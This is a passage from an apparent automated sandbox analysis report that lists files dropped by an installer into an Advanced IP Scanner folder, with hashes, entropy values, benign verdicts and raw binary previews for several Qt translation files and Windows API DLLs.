                                                                                                                                                                                                  SHA-256:7117B0D25A9C04FBEE7F8D5D9D3B2D0E5C1A02831B70D735EC24D9B056753A74
                                                                                                                                                                                                  SHA-512:DA918A21E0A58BB2CB84087F2B96C209A5C050DF658F1B66329489423A9AACAB6B66514863E14477A5FF8D0CBA654567E4865FE6777484029511C57BF0D9DD6A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........V....;...<...;.......;.......;.. ....;..A6...O..X....[..T....^.......^..P...(5...e..G.......H,..M...K...=...N:...z..V...B..._...Y.......'.......M....y..N=.......q..............U....t..)....t..N....t..Xo.....>....j......5t......@...@U..H5..V...f...........C@.......u...........~..1h...`..5|...e..W.......X.......... =...DI.*.y.....*.y.....*.%..#..*.0..#..+.......+.....B.+....B.+....v.+....%..G.......G....)..H0...XA.Hw9.....Hw9.....I....'..J6......J6......J6....P.J6...F..LD......L.b..X..M.S..>..R.......V.......Wi...W..W.T...s.Z.|..Ok.[f3..S<.gc......w0K..Ep..H...$.......Y^...T......."..3....~..5... d..C....T..-+..2...........W.......]..9.E..>..L.#.._..M$o...|.e.....P.l8...4....^..G...I....D......@.......PY......V...>......>......3...;..l...Ht......7..5.l..\#.AV...'M.y....U....0..Q ......P.......V]..tb..3.......................Q{......;V......LZ.(....P..1V...(l.R....0{.W.<..\..f.~..!\......2...1........^..45...5...Y......2...c..D..;6...^9.q.J..M$..I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_th_th.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26514
                                                                                                                                                                                                  Entropy (8bit):5.365287004508335
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:nUzD+5WAlXcVhAB44F7JjbP2HvOqwtew5Mg+Xl+UWZhS4vr7:nMGWAlXcV+m4F7JjbP2P9wxMg+X4f9
                                                                                                                                                                                                  MD5:31966D909B8293307AC3545ACA55CD13
                                                                                                                                                                                                  SHA1:1B49E43C0109445BA5068E2ED8422CB308D99B12
                                                                                                                                                                                                  SHA-256:81B17400011DC60FD3CDBEDA6F52E3E848B0A8C754703CD32E4DBEB82A77C14B
                                                                                                                                                                                                  SHA-512:7CF39F060267A043DEAA52C7A1F7DBA00EB24957264C349D9322BD1E8506151A566E26FAB9B45ED5FEB7140EBE05A8AC89062DAF5D2FA4AE4845735036694EE8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........S....;...^...;.......;.......;.......;..>....O..VL...[..R&...^..,C...^..M...(5......G.......H,..K...K...;(..N:...x..V...?..._...W.......&.......KG...y..K................\......Sb...t..'....t..L&...t..U......;....j......5t......@...=...H5..T#..f...,g......@........M...........~../....`..3*...e..Um......U.......... =...A..*.y.....*.y...9.*.%.."..*.0.."7.+.....7.+.......+....f.+......+....#..G.......G....'..H0...U..Hw9...5.Hw9.....I....%..J6....0.J6......J6....b.J6...D..LD....|.L.b..V..M.S..<n.R.......V....,..Wi...U..W.T...S.Z.|..L..[f3..P..gc......w0K..B...H...".......W....T...s..."..0....~..2... d..A....T..*...2...........T.......Z..9.E..;..L.#..]g.M$o.....e.......l8...2Q...^..DL..I....0......=.......M.......TK..>......>...^..3..+...l...E.......5..5.l..Y..AV...%o.y....R....0..Nz......Mo......S...tb..1`...............m......N.......8.......I..(....N..1V...&|.R.....#.W.<..Zc.f.~...p......0j..1........^..1....5...O......h...c..An.;6...[..q.J..J...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_tr_tr.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27282
                                                                                                                                                                                                  Entropy (8bit):4.801156368722529
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:ZUOMiBL2+9VpzlQLm8QKHsbWSBSj4a/sqS4uCRam1bUvmRF:boP64jf+4uCRR
                                                                                                                                                                                                  MD5:4DD48C8DA1964B46D4D972244288081A
                                                                                                                                                                                                  SHA1:1A9802C9FA07BF41FAF924E2C2DE6A9D6E6EFFC5
                                                                                                                                                                                                  SHA-256:572E3D6ABD3A7BE7F4F464DDBD53A6AE2657E8DC0427B59D9A942D8A04833323
                                                                                                                                                                                                  SHA-512:59A873E28746DA37458C3C37EC8B7E7F303E57FA6EADC3A2DCAB8456DCA625EA4A96D05B83DA434A92FE3CFB37578564B0279A9E27E85D6E8ED3EF4E7E4021E9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........V....;.......;...w...;...S...;.. ....;..A....O..Y\...[..UD...^...G...^..QP..(5......G.......H,..N...K...=...N:......V...Ck.._...Z.......'.......N....y..O................j......Vr...t..)G...t..O....t..Y......>....j...!..5t...)..@...@...H5..W/..f....m......D2.......c.......S...~..1&...`..5....e..X.......X........,. =...E=.*.y...P.*.y...-.*.%..#..*.0..#..+.......+.......+......+......+....%_.G.....5.G....)..H0...X..Hw9...C.Hw9...[.I....'d.J6......J6....D.J6......J6...G..LD......L.b..Y4.M.S..?H.R.....<.V.......Wi...X..W.T.....Z.|..PK.[f3..S..gc....v.w0K..FZ..H...$u......Z....T......."..2....~..52.. d..D....T..,...2...........W.......]..9.E..>Z.L.#..`e.M$o.....e.......l8...4....^..G...I....D......@.......Q.......WS..>......>...~..3..-...l...IR......7..5.l..\..AV...'!.y....U....0..Q.......P.......V...tb..3................c......R#......;z......M8.(....Q|.1V...(<.R....0%.W.<..]m.f.~.. .......2...1........^..4....5..........|...c..D..;6..._..q.J..N...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_uk_ua.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28836
                                                                                                                                                                                                  Entropy (8bit):5.274937745581086
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:evIxSKa3n9xd9wBClaVMxIswLfg0x6WcX:eG+X7YIUVMYk
                                                                                                                                                                                                  MD5:EE64BC556D9E554E5122531BBA368240
                                                                                                                                                                                                  SHA1:C691C2D832157EF9FD50F0D2C5B91EA9B6934979
                                                                                                                                                                                                  SHA-256:11D722019F26DAEF74AF7EAE33823B4625D4EBBC33352D5EFAC85D19B2BA0658
                                                                                                                                                                                                  SHA-512:23BE3849BE62BEE12E645E01E05D45ACCB2D575F15D50643FC5658F37C6143E66BE2A80010E030C78059357F7E45FB9D9EF2E1625A59505BD74C99CA2EA749BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........\....;.......;...1...;.. G...;.."!...;..F....O.._....[..[J...^..1q...^..V...(5......G.......H,..S...K...B...N:......V...G..._...`.......*F......T....y..Tg......................\....t..+....t..T....t.._;.....C....j.. ...5t......@...E...H5..]_..f...1.......H....................~..4....`..:....e..^.......^.......... =...I..*.y.....*.y.....*.%..&..*.0..&1.+.......+.......+....H.+....h.+....'..G....!-.G....,W.H0..._..Hw9.....Hw9.....I....)..J6....\.J6......J6....r.J6...Lq.LD......L.b.._j.M.S..Df.R.......V....1..Wi...^Z.W.T...I.Z.|..U..[f3..Y..gc....F.w0K..J...H...&.......`D...T......."..6....~..9... d..I....T../...2...........].......c..9.E..C^.L.#..f].M$o.....e.....:.l8...9!...^..L...I....N......E.......V.......]...>...E..>......3..1...l...N.......<..5.l..b..AV...)..y....[....0..Wh......VS......]'..tb..7.......................W.......@.......Rt.(....W..1V...*..R....3..W.<..cW.f.~..#.......6z..1........^..8A...5...i......L...c..Il.;6...d..q.J..SP..I....!..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_vi_vn.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27204
                                                                                                                                                                                                  Entropy (8bit):5.005345988323232
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:OpTFOkqnz8B1NM9aQ3T07mnagn7UMHJEt5jTlAXSHjcvHrP:ORFInz8BbM9aQ3w7gaMJk0
                                                                                                                                                                                                  MD5:53839022420E21292B81995749C5BCBD
                                                                                                                                                                                                  SHA1:D050A1FD64DCA4D57F9C15B71838811F3C5CF51B
                                                                                                                                                                                                  SHA-256:44900BCBB56194E2153DD1F0963DC5947C817C2A33D3A55E39A3DCDE1FDEB66A
                                                                                                                                                                                                  SHA-512:6D93BB2E3C193F21EC86456694B447899C21CC3CCE606307E9EAB3F8A8F0D92DE75A167C94F20F8AC45BFEE5F7E9192257D5F17AF46DF44598DE77E6FB5E008B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........Vp...;...`...;.......;.......;.. ....;..A....O..Y4...[..U ...^.......^..Q...(5......G.......H,..N...K...=...N:......V...B..._...Zj......((......NE...y..N................2......VH...t..)....t..O6...t..X......>....j......5t......@...@...H5..W...f...........C........q...........~..1~...`..5....e..XW......X.......... =...D..*.y.....*.y.....*.%..$X.*.0..$..+.......+.....J.+....R.+......+....&..G.......G....*..H0...X..Hw9.....Hw9.....I....'..J6....0.J6......J6....Z.J6...G..LD......L.b..Y..M.S..?T.R.......V..../..Wi...W..W.T.....Z.|..O..[f3..S..gc......w0K..E...H...%1......Y....T......."..3D...~..5`.. d..D1...T..-K..2...........Wv......]..9.E..>f.L.#..`'.M$o.....e.....f.l8...5....^..GL..I....B......@.......P.......W5..>...'..>......3......l...H.......8R.5.l..\..AV...'..y....U....0..Q.......P.......V...tb..3.......................Q.......;.......L..(....Q>.1V...(..R....0..W.<..]..f.~..!.......2...1........^..4i...5...u......H...c..Dr.;6...^..q.J..M...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_zh_cn.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21282
                                                                                                                                                                                                  Entropy (8bit):5.593895866111406
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:yuFG9W5Ig0o3We2RYzomp0T/MpVLcLvF13fLQ:vFG9W5Ig0o3Weauoz0pVQ4
                                                                                                                                                                                                  MD5:6885AC8F42A02A32B59AA84D330925C3
                                                                                                                                                                                                  SHA1:A070B4B8BF1128197681487D332168A537107FB9
                                                                                                                                                                                                  SHA-256:2D7D17A4ECD78F916216C9E0D11897742A9AAF1E0988F60579B034319F2397D8
                                                                                                                                                                                                  SHA-512:4765739E9E45059E5A57F970133D11E8C418DE43A36602A21561A4A1027EE450AF091DA1F7BBD4CE5FD00299422679B66AC88516ACF618EA15931C3261850E9E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........AX...;.......;...5...;.......;...W...;..16...O..C....[..@J...^..#E...^..=...(5......G....Z..H,..:...K....8..N:...|..V...2Y.._...D........\......:....y..;O.......c..............A4...t...u...t..;....t..Cc...../....j......5t......@...0...H5..A...f...#e......3........g.......1...~..%h...`..(....e..B.......C........0. =...3..*.y.....*.y.....*.%.....*.0...C.+.......+.......+....4.+....@.+.......G.......G.......H0...C?.Hw9...y.Hw9...G.I.....".J6......J6......J6......J6...5..LD......L.b..C..M.S../x.R.......V....#..Wi...B..W.T.....Z.|..<9.[f3..?&.gc......w0K..4...H...........D....T......."..&....~..(@.. d..3a...T.."G..2....)......B<......G..9.E.....L.#..I..M$o.....e.....B.l8...(....^..5...I...........0.......<.......A...>......>...,..3..#...l...6.......*L.5.l..FE.AV......y....@....0..=.......<.......A...tb..'J......................=.......,.......9..(....=D.1V......R....$..W.<..F..f.~..........&...1........^..'....5...!..........c..3..;6...G..q.J..:r..I....U..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_zh_tw.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21326
                                                                                                                                                                                                  Entropy (8bit):5.601982778539758
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:4DlwToFrc4xM4iwF3sE5nARVIAgNv95UWr/LGLKbTR1Zo:4DlwTsc4O4i8sE5ncWjz5UWr/y/
                                                                                                                                                                                                  MD5:B961B562628E357221F12EB6A212860C
                                                                                                                                                                                                  SHA1:35E6905D0410CEDC12B77EA8735CEDCB74913B25
                                                                                                                                                                                                  SHA-256:5730516CB06E0DAA2F97B0772C2233345E70890A775D1850F4031FDAAB993967
                                                                                                                                                                                                  SHA-512:8A887CC03D628FDAE3F0B8A4DC4E0E71793D95AF7B561D6DDED82944E3B4D9C92CB93989A3236815D00CAEB5BC57E87809A372FC5B8509D36A54403EC2CAEB37
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........A....;.......;...k...;.......;.......;..1n...O..C....[..@x...^..#....^..=J..(5......G.......H,..;...K.......N:......V...2..._...D...............;'...y..;{.......o..............Ab...t.......t..;....t..C....../T...j......5t...!..@...0...H5..B...f...#.......30.......m.......E...~..%....`..(....e..C'......CK.......H. =...3..*.y.....*.y.....*.%...F.*.0...q.+.......+.....*.+....@.+....\.+.......G.......G.......H0...Cq.Hw9.....Hw9.....I.....Z.J6......J6......J6......J6...5..LD......L.b..C..M.S../..R.....@.V....#..Wi...B..W.T.....Z.|..<e.[f3..?R.gc......w0K..4...H...........Db...T......."..'....~..(... d..3....T.."...2....+......Bj......G7.9.E.....L.#..IK.M$o.....e.....^.l8...(E...^..5...I...........0.......=.......B-..>......>...2..3..#G..l...7&......*..5.l..Fi.AV....#.y....@....0..=.......<.......A...tb..'.......................=.......-.......:..(....=p.1V......R....$..W.<..F..f.~...&......&...1........^..'....5...Q..........c..3..;6...H..q.J..:...I....i..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19136
                                                                                                                                                                                                  Entropy (8bit):6.960788331628294
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:bvmMWVghW/ivSx9YOCAs/nGfe4pBjSf+GEOWNArXVWQ4mWPQ4mqnajxcRGlPMRdk:XW2hWKSUA0GftpBjxDib4mll7PedGSk
                                                                                                                                                                                                  MD5:37DA7F6961082DD96A537235DD89B114
                                                                                                                                                                                                  SHA1:DAA1E2E683FA0512FF68EB686D80B4AA3B42E5B6
                                                                                                                                                                                                  SHA-256:6EE46C6B6727EB77BCBCDD54DC506680CA34AF7BC7CA433B77775DE90358844E
                                                                                                                                                                                                  SHA-512:AF4F28E3319344D2E215F56026E9CEE5C951B5C44374C7EEEA6790D18F174D7E785CEACBBF1450D5CA1D76F207B5F7B4F24674468F30BE84C6C3E90C48CE2A2C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................+............ ...................<..............8............................................................................text...;........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18624
                                                                                                                                                                                                  Entropy (8bit):6.97464085764015
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:sZWVghW/Y7l9YOCAs/nGfe4pBjSfXVJ4WNArXVWQ4mWGqnajxcRGlPMRd54kft:4W2hWQ7QA0GftpBjcqRll7PedGkft
                                                                                                                                                                                                  MD5:3B3BD0AD4FEA16AB58FCAEAE4629879C
                                                                                                                                                                                                  SHA1:EB175F53640FB8AC4028A7657BBF48823A535677
                                                                                                                                                                                                  SHA-256:DCB9CF7E31D6772434C683353A1514F10D87D39FEAA9B3EDF3FA983B2988294C
                                                                                                                                                                                                  SHA-512:F206E7F56A218A1725F212B20416210C228E60D0D3C44F9A598C93ACB10BF8A3C961B4C4D104AE0F166598BE5C5102A1FF77A39D2B70743E784F69C82FD4C730
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......S....@.......................................... ...................<..............8............................................................................text... ........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18624
                                                                                                                                                                                                  Entropy (8bit):6.982441576564087
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:NvW2hW+77QA0GftpBjuYvd0WrlI663Upe:NR9yi866kQ
                                                                                                                                                                                                  MD5:584766DF684B2AD2A3A5B05A5B457FAC
                                                                                                                                                                                                  SHA1:C207B7AEDB8D978C8320A1454331519A8365F20D
                                                                                                                                                                                                  SHA-256:B15964D49A2C5219E0923137AA9028611BE81FDBDCBB0D43BB3AAA23114E401F
                                                                                                                                                                                                  SHA-512:3BC7D49F997E489466858A21DAA22B397ADB8E736D7E064542ED5F73CD87B52CBD412CDEC2B4B892F9231C2562E24C8DEBAB73054E878405F2B2A022E86D26B8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......!h....@.......................................... ...................<..............8............................................................................text...+........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18624
                                                                                                                                                                                                  Entropy (8bit):7.00674396465633
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:+F87mxD3XWVghW/IvSx9YOCAs/nGfe4pBjSf/qoWNArXVWQ4mWBqnaj9RlS6Vab:h70W2hWQSUA0GftpBjoqUOlBRAkO
                                                                                                                                                                                                  MD5:906CB0C8ABA8342D552B0F37DDFD475F
                                                                                                                                                                                                  SHA1:A3CD528B9C212FEA97495A557A91D638B1608418
                                                                                                                                                                                                  SHA-256:582E87ADE6DAC258844154B068C291FF8D8F6D7AB6EE029FCD3CF1391874C74B
                                                                                                                                                                                                  SHA-512:27B33658A30010E0C6A09F5B1359A9E39871B7851D0CFB43F5E2063FB77DAFB34DF9724FCE82FC7826463104FEE0820AE4E996A76DD3912490689686EA05844B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22208
                                                                                                                                                                                                  Entropy (8bit):6.906399541614446
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:3CYPvVX8rFTsdWVghW/VvSx9YOCAs/nGfe4pBjSfZCLWNArXVWQ4mWbmqnaj9Rlg:1PvVXfW2hW9SUA0GftpBj8yBlBRAkad
                                                                                                                                                                                                  MD5:779A8B14C22E463EA535CBCA9EA84D49
                                                                                                                                                                                                  SHA1:4620531D5291878C10D6E3974F240B98BC7FB4B9
                                                                                                                                                                                                  SHA-256:FC0551DE11B310DFD8F3FC924F309D5E754B547FFC475CF6C3D007BB5366F148
                                                                                                                                                                                                  SHA-512:08882528DF66FC582A890AD64C7F96E8F9DE56D4871A4D9B6B32E1C3FFB0C29B425F4CC893B2575F6697FFAFBB56BA84D43D602483B0470488DF823D445B84E4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@.......6....@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18624
                                                                                                                                                                                                  Entropy (8bit):6.98650705248822
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:7WVghWu7vSx9YOCAs/nGfe4pBjSby+ggmGWNArXVWQ42WHmMqnaj9RlS6VSyS:7W2hWmSUA0GftpBj+1bMlBRAkS3
                                                                                                                                                                                                  MD5:F6D1216E974FB76585FD350EBDC30648
                                                                                                                                                                                                  SHA1:F8F73AA038E49D9FCF3BD05A30DC2E8CBBE54A7C
                                                                                                                                                                                                  SHA-256:348B70E57AE0329AC40AC3D866B8E896B0B8FEF7E8809A09566F33AF55D33271
                                                                                                                                                                                                  SHA-512:756EE21BA895179A5B6836B75AEEFB75389B0FE4AE2AAFF9ED84F33075094663117133C810AB2E697EC04EAFFD54FF03EFA3B9344E467A847ACEA9F732935843
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......W5....@.............................L............ ...................<..............8............................................................................text...\........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18624
                                                                                                                                                                                                  Entropy (8bit):7.046229749504995
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:WUWVghW/zvSx9YOCAs/nGfe4pBjSfEtcsWNArXVWQ4mWV9QqnajxcRGlPMRd54xS:WUW2hW7SUA0GftpBjBj3ll7PedGxC/
                                                                                                                                                                                                  MD5:BFB08FB09E8D68673F2F0213C59E2B97
                                                                                                                                                                                                  SHA1:E1E5FF4E7DD1C902AFBE195D3E9FD2A7D4A539F2
                                                                                                                                                                                                  SHA-256:6D5881719E9599BF10A4193C8E2DED2A38C10DE0BA8904F48C67F2DA6E84ED3E
                                                                                                                                                                                                  SHA-512:E4F33306F3D06EA5C8E539EBDB6926D5F818234F481FF4605A9D5698AE8F2AFDF79F194ACD0E55AC963383B78BB4C9311EE97F3A188E12FBF2EE13B35D409900
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18624
                                                                                                                                                                                                  Entropy (8bit):6.993015464813673
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6YOWVghW/KgbXH9YOCAs/nGfe4pBjSfSAWNArXVWQ4mW/M2qnaj9RlS6VRob:EW2hWSgbCA0GftpBj8qRlBRAka
                                                                                                                                                                                                  MD5:FC68978ABB44E572DFE637B7DD3D615F
                                                                                                                                                                                                  SHA1:47D0F1BD5195CE10C5EC06BDB92E85DDA21CDAB3
                                                                                                                                                                                                  SHA-256:DF6BED7BCCCAF7298133DF99E497FA70DA761BE99C2A5B2742CFC835BF62D356
                                                                                                                                                                                                  SHA-512:7EB601D7482DDDC251898D7EFBDFE003BAB460AF13B3CB12F1D79FDF9D9D26FC9048FD8CA9969B68BBE5547FDCD16F59D980527A5B73B02DA145419834234873
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@............................._............ ...................<..............8............................................................................text...o........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
